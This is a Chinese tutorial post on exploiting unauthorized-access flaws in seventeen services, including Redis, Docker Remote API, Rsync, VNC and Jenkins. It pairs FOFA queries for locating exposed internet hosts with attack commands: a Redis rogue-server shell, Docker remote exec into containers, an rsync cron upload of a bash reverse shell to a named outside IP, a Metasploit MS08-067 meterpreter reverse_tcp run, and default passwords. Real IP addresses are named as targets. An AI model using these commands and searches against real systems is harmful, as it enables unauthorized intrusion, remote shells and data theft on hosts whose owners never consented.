当前位置: 首页 > news >正文

未授权访问

一、Redis未授权访问漏洞

 1.下载vulhub到靶机中

2.进⼊⽬录:cd /vulhub-master/redis/4-unacc

3.启动:docker-compose up -d

4.检查:docker ps

5.再攻击的kali机器上安装redis程序进⾏服务的链接

6.安装redis

                apt-get install redis

7.redis链接

                redis-cli -h 124.221.58.83 -p 6379

8.下载以下攻击项⽬

https://github.com/n0b0dyCN/redis-rogue-server

9.使⽤⼯具执⾏以下命令获取⽬标的命令执⾏环境,交互时输⼊ i 键会获取 Shell环境

python3 redis-rogue-server.py --rhost 靶机IP --lhost 靶机IP

二.Zookeeper未授权访问漏洞

1.使用佛法语句进行寻找漏洞

port="2181" && "Zookeeper" && country="US"

2.在Kali中使⽤以下命令进⾏未授权访问漏洞测试

echo envi | nc ip 端⼝

3.接下来就可以使用zookeeper工具进行连接

https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

三、Jenkins未授权访问漏洞

1.使用fofa语句进行资产的搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

2.依次进行点击

3.然后输入以下内容

四、Jupyter NoteBook未授权访问漏洞

1.通过以下fofa语法进⾏产品搜索

"Jupyter Notebook" && port="8888" && "terminals"

2.有漏洞的直接点击即可,然后如图所创建一个新窗口

3.如此就可以执行任意命令

五、Elasticsearch未授权访问漏洞

1.搜索语句为

 "Elasticsearch" && port="9200"

2.直接访问即可

六、Docker Remote API未授权访问漏洞

1.搜索语句为

 port="2375" && "docker"

2.拼接路径/info,/version

3.使用-H参数连接目标主机的docker,使用ps命令查询目标系统运行的镜像。

docker -H tcp://ip:2375 ps
docker -H tcp://ip:2375 version
docker -H tcp://ip:2375 exec -it 1f4 /bin/bash

七、Kubernetes Api Server未授权访问漏洞

1.用语句进行搜索

port="8080" && app="Kubernetes"

2.目标在打开的网页中直接访问 8080 端口会返回可用的API列表

八、Hadoop未授权访问漏洞

1.用语句进行搜索

port="8088" && app="Hadoop"

2.打开网站之后不用进行验证,可以直接访问

九、ActiveMQ未授权访问漏洞

1.用语句进行搜索

 body="ActiveMQ" && port="8161"

2.输入默认密码admin/admin

十、RabbitMQ未授权访问漏洞 

1.用语句进行搜索

port="15672"      
port="15692"     
port="25672"

2.然后进行登录,登录的密码都是guest

十一、JBoss未授权访问漏洞 

1.语句进行搜索

title="Welcome to JBoss" && icon_hash="-656811182"

2.拼接以下路径且无需认证直接进入控制页面

http://ip:port/jmx-console/
http://61.0.111.119:8080/jmx-console/

十二、Ldap未授权访问漏洞

1.语句搜索

port="389"

2.进行工具下载,连接如下

http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/

3.用工具进行连接,测试成功即代表有漏洞

十三、Rsync未授权访问漏洞

1.使用语句进行搜索

(port="873") && (is_honeypot=false && is_fraud=false)

2.nmap扫描,上传下载文件

nmap -p 873 --script rsync-list-modules ipaddress建立连接并下载文件
rsync rsync://124.221.58.83:873/
rsync rsync://124.221.58.83:873/src/下载文件
rsync rsync://IP:port/src/etc/passwd ⽬标路径上传文件
rsync 文件地址 rsync://124.221.58.83:873/src/home/

3.然后就可以进行反弹shell

查看定时文件
rsync rsync://124.221.58.83:873/src/etc/crontab下载定时任务文件
rsync rsync://124.221.58.83/src/etc/crontab /tmp/tmp/crontab.txt创建shell文件
#!/bin/bash
/bin/bash -i >& /dev/tcp/114.132.92.17/4444 0>&1更改权限
chmod 777 shell上传shell到目标靶机
rsync /tmp/shell rsync://124.221.58.83:873/src/etc/cron.hourly攻击机监听
nc -lvp 4444

十四、VNC未授权访问漏洞

1.使用语句进行搜索资产

(port="5900") && (is_honeypot=false && is_fraud=false)

2.使用msfconsole打开msf6 的命令行

# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 172.16.1.1-254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 172.16.1.200
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.1.200
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 172.16.1.10
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后,直接run vnc可控制远程虚拟机# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.1.200
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit

3.然后进行vnc的连接

vncviewer ipaddress

十五、Dubbo未授权访问漏洞

1.使用语句进行搜索资产

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

2.使用telnet进行连接测试

telnet ip 端口

十六、NSF共享⽬录未授权访问

1.使用语句进行搜索资产

"nfs"

2.依次输入以下语句,进行复现

安装 nfs 客户端
apt install nfs-common查看共享目录
showmount -e ip挂载相应共享目录到本地
mount -t nfs ip:/grdata /mnt卸载目录
umount /mnt

十七、Druid未授权访问漏洞

1.使用语句进行搜索资产

title="Druid Stat Index"

2.然后直接访问即可

http://www.xdnf.cn/news/1202869.html

相关文章:

  • C++ list 容器全解析:从构造到模拟实现的深度探索----《Hello C++ Wrold!》(16)--(C/C++)
  • window显示驱动开发—Direct3D 11 视频设备驱动程序接口 (DDI)
  • OpenLayers 综合案例-信息窗体-弹窗
  • 对于ui=f(state)的理解(react)
  • python毕业设计案例:基于python django的抖音数据分析与可视化系统,可视化有echarts,算法包括lstm+朴素贝叶斯算法
  • 【Datawhale夏令营】端侧Agent开发实践
  • 【Unity笔记】Unity Camera.cullingMask 使用指南:Layer 精准控制、XR 多视图与性能提升
  • [机缘参悟-236]:通过AI人工神经网络理解人的思维特征:惯性思维、路径依赖、适应性、不同场合不同言行、经验、概率、常规与特殊情形(正态分布)、环境适应性
  • 【linux】md5文件相似校验介绍与实战示例
  • 零基础学习性能测试第九章:全链路追踪-项目实操
  • 设计模式(十七)行为型:迭代器模式详解
  • react前端样式如何给元素设置高度自适应
  • debian系统分卷是不会影响系统启动速度?
  • 内存分页机制分析在海外VPS系统的测试流程
  • C语言:20250728学习(指针)
  • 如何给电脑换个ip地址?电脑换ip几种方法
  • 从零开始的云计算生活——第三十七天,跬步千里,ansible之playbook
  • linux_centos7安装jdk8_采用jdk安装包安装
  • 电脑出现英文字母开不了机怎么办 原因与修复方法
  • 【Java EE】多线程-初阶-线程的状态
  • 云原生作业(haproxy)
  • 设计模式十二:门面模式 (FaçadePattern)
  • C++11之lambda及包装器
  • java设计模式 -【责任链模式】
  • 【智慧物联网平台】编译jar环境 Linux 系统Maven 安装——仙盟创梦IDE
  • RK3568基于mpp实现硬解码(二):FFmpeg + mpp实现ipc摄像头图像解码
  • C++---初始化列表(initializer_list)
  • maven 打包报错 process terminated
  • 数据库原理
  • MCP资源管理深度实践:动态数据源集成方案